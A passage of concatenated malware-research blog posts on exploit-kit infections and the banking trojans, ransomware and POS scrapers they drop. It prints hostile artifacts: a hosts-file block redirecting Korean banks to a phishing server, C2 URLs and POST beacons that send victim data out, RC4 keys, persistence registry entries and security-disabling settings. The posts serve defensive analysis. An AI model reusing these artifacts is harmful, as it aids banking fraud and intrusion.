Else, it executes a shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former was basically used to bypass DEP

The binary downloaded is a banking malware with backdoor capabilities under the family of Venik.

Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually dropper which when executed installs a dll file in C:\{random} folder using random name like “c:\tqcsv\krxxc.rxk”. It executes this dll as:

• “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

Creates mutex (M142.0.137.66:3201) and creates autostart key entry such as:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following urls:

• http://142[.]0[.]137[.]68:803
• http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 using TCP port  3201 and waits for a command from the server. The server can issue a command that starts a remote access service from the infected client.

It also collects files from %ProgramFiles% folder and mapped drives. It copies the files to a random file in C:\ using xcopy  and uploads the file to its server using an HTTP session.

It modifies the hosts file (%system32%\drivers\etc\hosts) and adds the following lines. It effectively redirects the users visit of banking sites to a site controlled by the attacker which is actually a phishing site:

142.0.137.199 www.shinhan.com.or
142.0.137.199 search.daum.net
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 openbank.cu.vo.kr
142.0.137.199 www.busanbank.vo.kr
142.0.137.199 www.nonghyup.com.or
142.0.137.199 www.shinhan.ccm
142.0.137.199 www.wooribank.com.or
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.epostbank.go.kr.or
142.0.137.199 www.ibk.co.kr.or
142.0.137.199 www.ibk.vo.kr
142.0.137.199 www.keb.co.kr.or
142.0.137.199 www.kfcc.co.kr.or
142.0.137.199 www.lottirich.co.ir
142.0.137.199 www.nlotto.co.ir
142.0.137.199 www.gmarket.net
142.0.137.199 nate.com
142.0.137.199 www.nate.com
142.0.137.199 daum.com
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.zum.com
142.0.137.199 zum.com
142.0.137.199 naver.com
142.0.137.199 www.nonghyup.com
142.0.137.199 www.naver.com
142.0.137.199
142.0.137.199 www.nate.net
142.0.137.199 hanmail.net
142.0.137.199 www.hanmail.net
142.0.137.199 www.hanacbs.com
142.0.137.199 www.kfcc.co.kr
142.0.137.199 www.kfcc.vo.kr
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.kbstir.com
142.0.137.199 www.nonghuyp.com
142.0.137.199 www.shinhon.com
142.0.137.199 www.wooribank.com
142.0.137.199 www.ibk.co.kr
142.0.137.199 www.epostbenk.go.kr
142.0.137.199 www.keb.co.kr
142.0.137.199 www.citibank.co.kr.or
142.0.137.199 www.citibank.vo.kr
142.0.137.199 www.standardchartered.co.kr.or
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.suhyup-bank.com.or
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.kjbank.com.or
142.0.137.199 www.kjbank.com
142.0.137.199 openbank.cu.co.kr.or
142.0.137.199 openbank.cu.co.kr
142.0.137.199 www.knbank.co.kr.or
142.0.137.199 www.knbank.co.kr
142.0.137.199 www.busanbank.co.kr.or
142.0.137.199 www.busanbank.co.ir
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.suhyup-bank.ccm
142.0.137.199 www.standardchartered.co.kr

                               Host File Modification

The phishing site asks for sensitive information that are not usually ask during a normal online banking session. 

There are also times that it will ask the user to visit other banking sites leading to phishing sites. This happens when it is likely that the phishing site does not currently support a bank.

Adding to its attack on Korean related services, it tries to disable Ahnlab related files and process. Ahnlab is a popular antivirus software in South Korea.

As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

Credits to Alex Burt for his help in discovery of this  infection.

The post Infected Korean Website Installs Banking Malware appeared first on Cyphort.

 On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com has been compromised and is currently infecting visitors via drive-by-download malwares. We immediately contacted psychcentral about this infection as early as we have discovered it. As of October 29, their technical team identified the problem and addressed the issue. Psychcentral[.]com is a leading independent metal health social network. It receives about 163,846 unique visitors per day.

The site was infected with an iframe injector that redirects to  Angler EK. It uses a flash exploit that targets the recent vulnerability in Adobe flash. We found it to be installing bedep and vawtrak. Bedep was known to be the notorious ad fraud malware and vawtrak is a banking trojan following the success of Zeus. We have seen Angler to be using bedep as its payload  but adding vawtrak in its arsenal is something we haven’t seen in the past until recently. Moroever, the vawtrak sample we got downloads a new memory scraping malware that scans for credit card data in memory. This is typical of Point Of Sale malware like the ones that affected Target stores.

Infection Chain

The iframe injection originates from an Ad server script that is using Open AdStream (OAS).
The script makes a request to oascentral[.]spineuniverse[.]com which leads to a function OAS_RICH() responsible for injecting iframes on the web page.

Ad server script injecting iframe

The webpage finally leads to Angler EK landing page on margueriteyellow[.]bitcoininvesting[.]net. It uses a flash exploit that targets the following vulnerability:

• CVE-2015-5560, Adobe Flash Player versions prior to 18.0.0.232 on Windows and OS X.

The said vulnerability was already patched on 18.0.0.232 flash update.

network activity during infection

Payloads

We were able to obtain 3 executable payloads from this infection:

• a2ee0c22d0cbdaa1c8de45c4a487b96a – Bedep
• 28639b2c93a24ed6d178f3098ca23f2e – Vawtrak
• a1d1ba04f3cb2cc6372b5986fadb1b9f – POS malware

Bedep

As we have seen in the past, bedep’s  function is to execute Ad fraud campaigns. It usually arrives encrypted over the network to protect itself against traditional IDS/IPS solutions. It resides in the system as a dll file, usually in %PROGRAMDATA% folder. It also creates a folder using the machine GUID and drops itself there.

Vawtrak

Vawtrak (aka Neverquest) is a rising star in the field of financial trojans. It was first discovered in-the-wild in 2013. It arrives using several methods, usually via exploit kits, or as an attachment to spam email, or downloaded by macro malware embedded in Microsoft Office documents and spreadsheets.

It employs similar functions used by Zeus, like using webinjects to collect confidential  banking information and hooking APIs to intercept browser traffic. It also downloads an encrypted configuration which contains URLs it targets to inject.

It also contains a list of download URLs that points to its additional modules. The sample we obtained has the following download links in its config:

Vawtrak Config file snapshot

Samples downloaded from 176[.]99[.]11[.]154 are its additional modules. One interesting url is http://46[.]30[.]41[.]16/files/970.exe which is a downloader of a new RAM-scraping malware akin to the ones used in typical POS malware as described in a Cyphort Special Report.

Vawtrak resides in the system as a dll file in the %PROGRAMDATA% using random names such as:

• C:\ProgramData\Nuxbu\Zuzhot.dll

It creates a run key using regsvr32.exe to execute the DLL. e.g.,

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Value:{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}
  • Data:regsvr32.exe “C:\ProgramData\Nuxbu\Zuzhot.dll”

It downloads its configuration file from:

• http://ninthclub.com/Work/new/index.php

RAM scraping malware

Vawtrak downloads and execute  “970.exe ” which then downloads a dll component from from 91.234.34.44 via TCP port 30970. It saves this as follows:

• %ALLUSERS%\Application Data\{random}.dll

It then downloads additional file via HTTP Get from:

• 50.7.143.61/a_p/a_970.exe

And saves it as:

• %ALLUSERS%\Application Data\taskhost.exe

taskhost.exe scans for every running process and check the memory for credit card information. If it finds such a process, it creates a new thread that checks for track 1 and track 2 data:

process enumeration to scrape credit card data

It specifically checks for credit cards that starts with 3, 4, 5, or 6 which means cards like AMEX, Visa, MasterCard, Diners Club, Discover, etc.

track 1 and track 2 checking

We see in this infection how cybercriminals use multiple infection methods. Exploit kits are usually packaged to target multiple software with vulnerabilities to increase their coverage. We have reports how angler generates $34 Million annually from ransomware alone. We see in this infection that the group is after the money. We are not sure how much money are they raking in. Bedep and Vawtrak targets consumers while the RAM scrapping malware targets POS systems. One thing is for sure, the group behind this are looking to cash in.

Special thanks to Alex Burt and the rest of Cyphort Labs for their help in discovering and analyzing this infection.

The post Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware appeared first on Cyphort.

A new ransomware called Radamant has been discovered in early December 2015. On December 31, we found compromised websites redirecting to Rig Exploit Kit and downloading this ransomware. The following sites have been infected:

• www.yatra.com
• www.herbeauty.co

Infection Chain on yatra.com

Infection Chain on herbeauty.co

On the affected page, a malicious html code was injected at the end of the page. The code displays a malicious flash file that redirects to Rig EK landing page.

Injected Code

As of this writing the said websites are now free from infection.

Flash Exploit

The Rig EK on both sites uses the same flash exploit and also delivers the same payload. The flash exploit targets the following vulnerability:

• CVE-2015-5560

This is an old exploit which affects versions 18.0.0.209 and below. The exploit was patched on August 15, 2015 via Adobe flash player update 18.0.0.232. After exploitation, it will download its payload.

Radamant Ransomware

This is a new breed of ransomware that encrypts files using AES-256 encryption. Bleepingcomputer.com provides an excellent coverage of this ransomware. This malware was also found to be leased as a kit on private  malicious sites. It costs $1,000 to rent it for one month or potential buyers can test it for 48 hours for $100 USD.

Source: http://www.bleepingcomputer.com/news/security/radamant-ransomware-kit-for-sale-on-exploit-and-malware-sites/

As early as December 14, people have been complaining  on bleepingcomputer forum that  their files encrypted and renamed with .RDM or .RRK extension. This malware scans all files that match certain extensions and encrypts them using a unique AES-256 key for each file. The  generated AES-256 key is then encrypted with a Master key which is then embedded into the target file.

Network Connections:

The malware will first issue a POST request to its CnC server http://cutenaskare.com/domains.php to get possible domain/s

             POST http://cutenaskare.com/domains.php

             Server Reply: [7:cutenaskare.com]

Then it will POST to http://cutenaskare.com/API.php together with its ID and IP address to check if it is already registered in the server

              POST http://cutenaskare.com/API.php  id={machine fingerprint}&ip={victims IP address}

               Server Reply: [0:unknownID][6:{IP region e.g., RU}]

If the victim is new it will reply with [0:unknownID] which instructs the bot to register and post additional system information.

               POST http://cutenaskare.com/API.php   id={machine fingerprint}&apt=0&os={OS version}&ip={victims IP address}&bits={32 or 64 bit}&discs={Drive Letters}&pub={public key}&prv={private key}

               Server Reply:[r:good]

The server will send its public key and the malware will POST to:

              POST http://cutenaskare.com/mask.php

The server replies with a list of extensions to encrypt which also triggers the start of encryption. After the malware is finished encrypting files, it will show the following page informing the user that files have been encrypted and instructing the victim to pay .5 Bitcoin (approx 220 USD).

Luckily the malware’s encryption had some flaws which allows  Fabian Wosar to recover the encrypted files without paying the ransom. 

Fabian’s tool can be downloaded from the following link:

• emsi.at/DecryptRadamant

The tool has been updated to support the latest version known. It is also evident that the malware author/s aren’t pleased with Fabian as they placed some cursed strings on their code in the latest version.

The first version of radamant was first seen on virustotal.com on Dec 3, 2015 and we have identified 3 versions to date.

Indicators of Compromise

Mutex Names:

Radamant_v1_Klitschko_number_one

Radamant_v2_Klitschko_number_one

\Sessions\1radamantv2_emisoft_fucked

Install Path:

C:\Windows\DirectX.exe

Registry Keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

      Value:svchost or DirectX

      Data: C:\Windows\directx.exe

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

      Value: svchost or DirectX

      Data: C:\Windows\directx.exe

The post Radamant Ransomware distributed via Rig EK appeared first on Cyphort.

On January 27, 2016 Cyphort Labs discovered a site infected with Angler EK leading to a fileless Gootkit (a.k.a. XswKit) malware. The site was redirecting visitors to the malware through a compromised OpenX Ad server injecting a malicious iframe into the page. The iframe leads to Angler EK which downloads Bedep ad-fraud which then downloads a Gootkit loader. 

The loader injects a DLL component found in its body into explorer.exe. The injected DLL then downloads the fileless Gootkit and saves it in the registry as binary data,  then loading it in memory only.

Infection Chain

The compromised site is a Romanian broadcasting company, www.tvr.ro. The chain starts from bannere.tvr.ro making HTTP request to OpenX Ad server which will inject an iframe to the webpage. It appears that the OpenX Ad server was infected, specifically the file /openx/www/delivery/ajs.php. In previous years, there have been reports of a vulnerability in OpenX software which will allow the attacker remote code execution and code injection. We believe that this is likely the case here but we are not sure if this is a new vulnerability or an old one.

The iframe leads to  Angler EK which makes use of a flash exploit, CVE-2015-5560. The flash exploit downloads Bedep ad-fraud malware which will download the Gootkit loader. 

Gootkit Loader

This executable is saved in the %windir% folder with a random numbers as the filename e.g. 2144874235-50823412.exe. It is a packed executable where most of the packed data is in its .rsrc section.  After unpacking, it unwraps a DLL component found in its .data section and injects it into the explorer.exe process.

The unpacking of the DLL uses some custom decryption algorithm. After unpacking, it searches for explorer.exe process and inject the dll. There are two ways it can inject to explorer.exe: either using CreateRemoteThread or modifying the process’s main thread using ThreadContext APIs. Then it terminates itself.

Injected DLL

The injected dll is the main malware routine. Its main purpose is to download additional malware from a set of domains and save the downloaded malware as a binary data in the registry. It first checks for its execution environment which it also uses to initialize its variables. It also set an environment variable “vendor_id” with value  “unstable_2380″. The unstable value might mean this is an unstable version which could mean it is still under development. It then creates five threads, each with a different task.

The first 2 threads are responsible for downloading file-less malware while the third and fourth thread are responsible malware update. The fifth thread is a “kill-self” mechanism which is triggered by the presence of uqjckeguhl.tmp in the %TEMP% folder.

First & Second Threads

The first thread is responsible for injecting code into the current process. It starts by waiting for an event triggered by the second thread. Once that event is triggered, it will inject the code downloaded by the second thread to the current process, which in this case is explorer.exe.

The second thread connects to the following domains via SSL: 

• karlsadovnik75[dot]com
• karlsasyxushee75[dot]com
• karlsasyn725[dot]com
• karlsadroch27[dot]com
• karlsamochux2[dot]com
• karlsabrero22[dot]com
• karlsalomun9[dot]com
• karlsaranu82[dot]com
• karlsardabale9[dot]com

It uses HttpOpenRequest to make a request for SSL connections by setting the dWflag to 0x84800300, which sets the flag for INTERNET_FLAG_SECURE.

By using SSL, it is able to add a layer of protection for its network traffic. However, it appears that the certificates from these domains are not trusted. In order to bypass it,  it uses InternetQueryOption and InternetSetOption to set the INTERNET_OPTION_SECURITY_FLAGS to ignore invalid certificates.

The return of InternetQueryOptionA is ORed with 0x7380 which sets the following flags. In effect, it will ignore the untrusted certificates and ignore the redirect to https:

• SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS
• SECURITY_FLAG_IGNORE_CERT_CN_INVALID
• SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
• SECURITY_FLAG_IGNORE_WRONG_USAGE
• SECURITY_FLAG_IGNORE_UNKNOWN_CA
• SECURITY_FLAG_IGNORE_REVOCATION

The downloaded data is saved into the registry as follows:

• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_0
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_1
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_2
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_3
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_4
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_5
• HKEY_CURRENT_USER\Software\AppDataLow\binaryImage32_6

As shown, the saved data is encrypted and does not result into an executable file.

The second thread is also responsible for querying the data in the registry. It decrypts the data using a custom XOR decryption and decompresses it using RtlDecompressBuffer.

After which, it sets an event which triggers the first thread to proceed with process injection. 

Third and Fourth Thread

The fourth thread is responsible for downloading a file from the same domains above. The exact url path is {Domain}/rpersists2/%d where %d is some random number. It also expects the downloaded file to be having “MZ” header.

The third thread saves the downloaded file in the %Windir% folder using random number filename such as 2144874235-50823412.exe. It will also create a registry entry to ensure its execution every after reboot such as:

• HKCU\Software\Microsoft\Windows NT\CurrenVersion\Winlogon\Shell            
  • Data: C:\Windows\2144874235-50823412.exe

File-less Gootkit

Gootkit malware was first discovered in 2014. It is a banking trojan which initially focused on French banks and later on expanded to European banks as reported last December by Proofpoint.

The version we were able to capture appears to be version 4 as seen in its code:

The file size is pretty large at 4.86MB. References to source code can also be seen in the sample such as:

• src_iedriver\CabFile.cc
• src_iedriver\CertGen.cc
• src_iedriver\node_xz.cpp
• src_iedriver\socket_watcher.cpp
• src_iedriver\SpywareJSWrappers.cc
• src_iedriver\sqlite\node_sqlite3.cc
• src_iedriver\Threading.cc
• src_iedriver\VideoRecorder.cc
• src_iedriver\VmDetection.cc
• src_iedriver\wincrypt.cc
• src_iedriver\WindowsRegistry.cc
• src_iedriver\ProtectedStorage.cc

This gives us an idea of the capabilities of this malware. For instance, SpywareJSWrappers is likely the spyware module. This module has some APIs used for stealing information such as SpAddPortRedirection, DownloadFileRight, SpHookHttp, SpTakeScreenshot, SpHookRecv, SpHookSend, SpInsertInjection, SpHookKeyboard , etc.  

Summary

We have seen in this infection how attackers try to hide their infection through fileless malware and SSL traffic. They also utilized Angler EK as means to deliver their payload with its ability to detect AV engines and encrypted binary download. In our recent blogs, we have shown how Angler uses Bedep to download additional malware such as POS malware. Bedep is known to be an ad-fraud malware with download capabilities. We have not seen Bedep to be installed in the file system as the usual case so in this case, it acted only as a downloader. In this infection, the goal is to install Gootkit, a very dangerous malware with Backdoor and Spyware capabilities while achieving stealth through fileless infection and encrypted network traffic. The Gootkit loader is detected by Cyphort as TROJAN_WALDEC.DC.

Cyphort Labs will continue to monitor this threat and will provide additional details as needed.

As of this writing, the site is now clean from infection. 

Hashes

136fe64689f3919e1ba46e384ca8bef7 – Gootkit Loader

Special thanks to Alex Burt, Abhijit Mohanta, Sandeep Mandhotra and rest of Cyphort Labs for the discovery and analysis of this infection.

The post Angler EK leads to fileless Gootkit appeared first on Cyphort.

On March 9 2016, Cyphort Labs discovered an infection on a porn site keng94(dot)com redirecting visitors to an exploit kit and installing a Ransom Locker. The site is redirecting users to rg(dot)foldersasap(dot)com which is a RIG EK landing page that serves a malicious flash file and a malicious binary.

Chain and RIG EK landing

The binary arrives encrypted over the network and after decryption, it is saved in the %temp% folder. The binary is  a new trojan-downloader type of malware but we found multiple references of the string “FA” in its code which gives us an idea on the specific name/family of the malware.

•  ItsMeFA
• “version_fa”
• fa 155 

It adds an autostart key in the registry and copies itself in the StartMenu folder to execute itself at every start-up. It creates the file “C:\Users\Public\Music\Microsoft\Windows\Manifest\torrc“. This a tor configuration file which indicates how tor is being used.  The config file is set to start a “Tor Hidden Service” which can be accessed using port 1060. Tor is a free tool that is used for network anonymity.

torrc file contents

After creating the torrc file, it downloads a file from “http://myfiles(dot)pro/uploads/1275859359.Gaga.mp3″ and saves it as C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe

This file is actually an executable file masquerading as an mp3. When started, it spawns the following process:

• C:\Users\Public\Music\Microsoft\Windows\Manifest\tor.exe -f torrc

And as the usual tor execution process, the following files are created.

As a hidden service, tor automatically generates an onion address (e.g., 43zri2d6x2rruezl.onion) for your machine and it is written to a file named ‘hostname’. It uses this tor hidden service to download its final payload. The use of the tor hidden service allows the attacker to hide its malicious network activity in the tor network. A few moments later, the following window covers the entire screen making it unusable.

Since it locked our system, we thought of booting it in safe mode for further investigation but we were not able to do so. We decided to analyze it offline and we used volatility  to analyze the memory image.

Using Volatility to Find the Malware

We obtained the memory dump and process tree list using volatility command “pstree” and found the sd_app.exe to be the last process spawned which is also spawning another instance of tor.exe. This is likely the downloaded app and responsible for locking our screen.

To confirm this, we list visible windows using the “wintree” command  to identify which process is responsible for the lock screen and we identified the same sd_app.exe. 

Next, we identified the full path of the file using the process id and ‘cmdline‘ command

We dumped the disk and found the following list of files added.

The .bat  disables advanced boot options using bcedit which explains why we are not able to boot in safe mode.

contents of 1.bat

In-the-Wild Samples

Using VirusTotal service, we searched for similar samples and found 4 related samples. The first appearance of the sample is last February 01, 2016 with very low detection when first submitted. The files are also signed but the certificates are invalid. The resources section of the binary points to Russia or Ukraine. 

The variants of sd_app are also signed but 2 of the files still have no detection. 

We also found the files uploaded have debug prints in the code and files are uploaded from Ukraine which indicates that the actors are using VirusTotal to test if their malware is detected by heuristics. The first variant uploaded in VT has version 0.01a-154d as indicated by the ff string:

• WIN32-VS-x32-RELEASE-Feb  1 2016-15:33:48 v.0.01a-154d

The sample we got is version 0.02a-155. This clearly means it is in the early stage of development.

Conclusion

It’s been a while since we have seen a new family of Ransom Locker in-the-wild, probably due to the success of file-encrypting ransomware such as Cryptolocker, Cryptowall, Locky, etc. Also, Ransom Lockers can be easily cleaned by using “rescue discs”  so it was not effective for monetization. However, this new discovery is an advancement of ransom locker malware as it is using Tor to communicate to its CnC servers. By using tor, the attacker adds a layer of anonymity while doing its malicious activity. Also, while the attacker got your machine kidnapped, they created a Tor hidden service that allows the attacker to utilize your system for bitcoin payments or other malicious activity. As discovered by a researcher, there has been an spike of tor hidden services due to the ongoing spam campaign of Ransomware Locky. We also believe that the malware is in its early stages of development and the actors are testing the waters. 

Cyphort’s Advanced Threat Detection is able to detect the exploit infection and also detects all the payload files through behavioral detection.

Special thanks to Alex Burt and Cyphort Labs for their help in analysis and discovery of this malware.

IOCs

 Trojan Downloader hashes (FA)

5ed449fc2385896f8616e5cd7bee3f31

3a00058ccaee78805f539f2f6a259e92

d183ed4609e6ad7b00250c50a963db5d

6af38533fc8621128e943488a6f189ed

fb016a14ef1384ec78a284636631ab17

Screen Locker (SD)

29e71b864ac46bd3e2c216cce0403114

 639c62bcae61054a229ed3c79a109cc4

092b9e87bd75384df188feb2c4e402a2

e8231d2b7a04a5826a78b2908a1dd393

Mutex Names

ItsMeFA

ItsMeSD

The post New Family of Ransom Locker Found, Uses TOR Hidden Service appeared first on Cyphort.

On February 4, 2015, Cyphort Labs detected another malvertising campaign originating from gopego.com.  The site displays a malicious advertisement that redirects to other malicious links and eventually downloads CryptoWall ransomware.  

The attack serves an exploit package embedded in a flash file, including exploits which target four vulnerabilities. Among them the notorious CVE-2015-0311 which hit affyield.com a few days back.

Fig.1: iframe redirecting to the flash EK

Exploit Analysis

The initial flash file essentially is an exploit package. It is used as a platform to deliver other exploits embedded in the flash file. As seen before, the initial flash exploit (MD5: 31710b3fe36943bd5273d4fb0f0efa85) is obfuscated and loads a second stage flash file using loadBytes(). During the second stage, it stores a flash parameter (rtConfigEncodedString) to an RC4-encrypted JSON file. The key used is ‘vukocwgsos142160’. This JSON file contains the list of URLs to the binary payload along with the RC4 keys used to decrypt these binaries.

The second stage flash uses ExternalInterface.call() to inject Javascript into the browser DOM and requests various properties of execution environment.

It has several exploits embedded as binary data, in encrypted and compressed form. Based on the environment, it chooses an appropriate exploit and decrypts it using RC4, and decompresses it if necessary. The decryption key used  is “florbgd622662”. Once the chosen exploit is decrypted, depending on the vulnerability to exploit it is either injected via HTML/JS into the browser DOM or loaded as third stage SWF file.

The screenshot above shows binaries which exploit the following vulnerabilities:

After successful exploitation, the shellcode downloads an RC4-encrypted binary over the network which it decrypts using the key  “fxfdaxrrax“.

Cryptowall 3.0 downloaded over the network

Payload

MD5: 0cffee266a8f14103158465e2ecdd2c1

The final payload is a variant of Cryptowall version 3.0 (also known as Crowti). Similar to its predecessor, it uses RSA-2048 algorithm to encrypt files on the hard disk. It also drops the following already well known files in each of the affected directories. These files contain instructions on how to pay the ransom.

Once it finished encrypting files, the malware visits the url http://paytoc4gtpn5czl2.torpaysolutions.com/hkmxYL and demands victims to pay US$500 using Bitcoin in order to receive the decryption key that allows them to recover their files. It also displays a countdown of 168 hours (7 days) to pay the ransom. If the victim does not obey, the price will increase to  USD $ 1,000 after the countdown.

Instruction on how to pay the ransom using bitcoin

The ransomware program provides users with links to several Tor gateways leading to CryptoWall decryption services hosted on the Tor network.

There have been reports also that this new version of cryptowall use I2P (Invisible Internet Project) anonymity networks to carry out communication between victims and controllers to hide from researchers and law enforcement officials.

We have seen this malware connect to following CnC servers:

• asthalproperties.com:4444
• pratikconsultancy.com:8080

It retrieves the victims IP address by visiting ip-addrs.es.

Cyphort Labs has seen malvertising campaigns on the rise. They continue to be the favorite delivery method of threat-actors to deliver drive-by-download attacks. With every discovery of a zero-day exploit, actors are rapidly taking advantage and update their kits to deliver malicious binaries more reliably. It is always advisable to take precautionary measures when surfing the web and patch software to the latest available version.

Special thanks to McEnroe Navaraj, Alex Burt and the rest of the Cyphort Labs team for their help in the discovery and analysis of this attack.

The post Malvertising on Indonesian portal gopego.com delivers Cryptowall 3.0 appeared first on Cyphort.

Cyphort Labs discovered a malware campaign attacking over a hundred popular forum websites.  They are powered by outdated software so the vulnerability was likely used to compromise them, injecting the malware redirection code. The injection redirects to an exploit kit that downloads encrypted Gamarue malware that is sandbox-aware (does not execute in virtual environments).  As of Apr 8, 2015 the campaign is still ongoing. We analyzed one of the infection chains below, which happens to have minimal detection on Virus Total.

On April 6, 2015 Diychatroom.com was redirecting users to Fiesta Exploit Kit. It delivers a multi-stage binary payload that involves several malware families.  

 The affected websites include:

• www.Diychatroom.com
• www.dogforums.com
• www.e-cigarette-forum.com
• www.excelforum.com
• www.goldenretrieverforum.com
• www.horseforum.com
• www.loverslab.com
• www.ps3news.com
• www.scubaboard.com
• www.visajourney.com
• www.wranglerforum.com
• www.wrestlingforum.com
• and many others, 122 in total!

Many of the domains are owned by VerticalScope, a private company with 120 employees headquartered in Toronto, Canada. It specializes in buying and promoting websites and forums by using a big number of generic domain names they acquired over the past decade. VerticalScope has over 400 websites with combined reach of more than 80 Million unique visitors per month.

 Diychatroom.com Infection

The infection chain is as follows:

This EK is heavily obfuscated but after several layers of deobfuscation, it clearly reveals what it tries to do. It exploits the following vulnerabilities: 

• CVE-2013-2551 (IE)
• CVE-2015-0313 (Flash)

                                                            _{CVE-2013-2551}    

               _{First layer of flash using LoadBytes() to load second layer}

                     _{Second layer flash. CVE-2015-0313}

 Cyphort detects the infection through its chain heuristics engine and browser cooker engine.

Payload

The payload arrives encrypted over the network. This is a multi-stage malware that involves two files  obtained from its resource  and one file downloaded. 

• 77f22bfc9cf7e46c6e738d8b68ad19f6   – Main Dropper
• c091894cd23d49a14d5cabf0d60c379c  – Gamarue
• 2e543c5c9f1df385661d6e527eff2f46 – TrojanClicker.FleerCivet
• 7a6229f6afe767009fe22a119c4165a1 – Backdoor.Ruperk

At the time of discovery, only minimal detection was observed on VirusTotal. Cyphort’s Advanced Threat Detection platform detects all these files.

Main Dropper

The main dropper is armored and will not executed in a virtual environment. 

Armoring:

• anti-virtualbox
• anti-qemu
• anti-vmware

It checks the presence of string VBOX, QEMU and VMWARE from the return of SetupDiGetDeviceRegistryPropertyW.

Under non-virtual system, it drops 2 files obtained from its resource in the %TEMP% folder and execute it via CreateProcess or ShellExecute.

Resource 1

Family: Gamarue

[SHA1:] 039D532C02B7441D9D8C0DBB4D67FDC3AF428DD2

[MD5:] c091894cd23d49a14d5cabf0d60c379c

When executed, it creates a new process of msiexec.exe and injects code into it. It drops a copy of itself in %ALLUSERPROFILE% using random filename, e.g., “mssffnmc.exe”. 

It creates an autostart entry as follows:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

Value: {random}

Data : %ALLUSERPROFILE%\{copy of itself}

Disables some Windows security settings by changing the value of the following registry entries:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Value: “EnableLUA“

Data: “0“

 

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Value: “TaskbarNoNotification“

Data: “1“

Value: “HideSCAHealth“

Data: “1“

 

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

Value: “Hidden”

Data: “2″

It connects to its CnC server, nindziaboy.net to send data and receive commands. Communication to the server is encrypted and depending on the reply, it can perform the following commands:

• Report 
• Update
• Start

It also performs DNS request to the following domains:

• africa.pool.ntp.org
• oceania.pool.ntp.org
• asia.pool.ntp.org
• south-america.pool.ntp.org
• north-america.pool.ntp.org
• europe.pool.ntp.org

Resource 2

Family: TrojanClicker.FleerCivet

[SHA1:] 79137D2553FD19C2EB287957BB7E5506DF88CD02

[MD5:] 2e543c5c9f1df385661d6e527eff2f46

This malware’s main purpose is to open several hidden IE instance that access websites. 

Similar to the main dropper, it exits and do nothing if it detects it is running under virtual environment.

It drops a copy of itself as Update.exe in the %Windows%\FrameworkUpdate folder, then it creates a service for itself with name as “SystemUpdate”.

It injects to either, iexplore.exe, chrome.exe, firefox,exe, explorer.exe to gain elevated privilege and tries stop the following services:

• SharedAccess
• wscsvc
• MpsSvc
• WinDefend
• wuauserv
• BITS
• ERSvc
• WerSvc

It creates five threads that fire a hidden Internet Explorer Browser that visits the following URLs:

• http://videosearcher{.}org/4ff9ae/9126
• http://truesearchresults{.}com/?aff=7733&saff=9126

 _{Created several hidden IE that visits a url}

Afterwards, the following network connections were observed:

^{GET /analytics.js HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

^{User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)}

^{Accept-Encoding: gzip, deflate}

^{Host: www.google-analytics.com}

^{Connection: Keep-Alive}

^{GET /hit?t44.6;r;s1162*589*32;uhttp%3A//truesearchresults.com/casino.php%3Fparams%3D9kwXw9wr5uVwtaXFgiQ%252FkHA8rqoFYQ3%252FQyL57Nj%252BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%252F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%252BihDRQfDOiVNwnSfCX%252FAkh8UtPfNP%252B%252FH0WEbMuVy38gjCQ%253D;0.7172015003936206 HTTP/1.1}

^{Accept: */*}

^{Referer: http://truesearchresults.com/casino.php?params=9kwXw9wr5uVwtaXFgiQ%2FkHA8rqoFYQ3%2FQyL57Nj%2BtNc5FDmWNm5NQqv0FE6z7VtZ4vRBqUTKH2i9e0MFc4mgkHksu3IMGGk%2F79BfD4QQKwFiWDvJ2XekFUfGXmdWa%2BihDRQfDOiVNwnSfCX%2FAkh8UtPfNP%2B%2FH0WEbMuVy38gjCQ%3D}

